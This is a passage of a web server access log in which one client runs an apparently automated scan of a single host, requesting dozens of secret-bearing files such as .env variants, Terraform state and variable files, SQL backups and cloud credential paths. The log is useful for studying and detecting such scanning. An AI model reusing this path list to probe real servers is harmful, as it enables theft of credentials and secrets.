701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/gcp/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.202505" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.v6" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/stripe/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/docker-compose.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/wp/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.202412" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/ci/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.terraform/terraform.tfstate" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.tmp" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/inc/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env_20" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/store/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/htdocs/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.defaults" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.orig" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/env.bak" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/public_html/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/temp/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/node_modules/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/shopify-app/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/www/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202506" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/v1/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/netlify/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202511" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/backups/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.002" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old3" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/go/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/*.auto.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak13" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/azure/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old20" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old12" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/compose.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.9" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/heroku/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.svelte-kit/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old1" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/export.sql" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.3" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/includes/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/tmp/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/backend/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.template" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.005" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/docker/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.txt" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v2" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/pipelines/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/terraform.tfstate.backup" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/config/stripe.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/lib/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/services/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/config/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.circleci/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/golang/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/backup/.env.2026" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/rpc/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/infra/terraform.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/shared/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.vercel/project.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/backup.sql" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.default" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup12" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/panel/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/private/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.prod" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 404 404 - GET https net.profibot.hu "/api/.env.production" [Client 216.81.248.135] [Length 63] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/assets/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.dist" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-08" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak20" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-03" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/conf/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup20" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/billing/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/app/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.aws/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.docker" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 404 404 - GET https net.profibot.hu "/api/.env" [Client 216.81.248.135] [Length 52] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/config.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v5" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup15" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.production.local" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/production.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/docker-compose.override.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.14" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/prod.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/subscriptions/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/configmap.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.credentials/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 